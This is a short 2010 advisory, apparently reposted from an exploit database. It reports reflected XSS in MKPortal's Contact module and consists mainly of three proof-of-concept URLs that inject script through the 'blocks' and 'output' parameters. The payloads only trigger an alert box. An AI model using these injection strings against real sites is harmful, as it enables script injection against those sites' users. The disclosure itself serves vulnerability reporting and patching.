Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23596
HistoryApr 12, 2010 - 12:00 a.m.

MKPortal Contact module XSS Vulnerability

2010-04-1200:00:00
vulners.com
61

=========================================
MKPortal Contact module XSS Vulnerability

         The largest Exploit Database in the world !

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
1 \ \
/ >> Exploit database separated by exploit 0
0 \/
/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

Exploit:

/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E
/contact/[email protected]&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&[email protected]&output=%3Cscript%3Ealert(1)%3C/script%3E
/contact/[email protected]&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&[email protected]&blocks=%3Cscript%3Ealert(1)%3C/script%3E


Inj3ct0r.com [2010-04-11]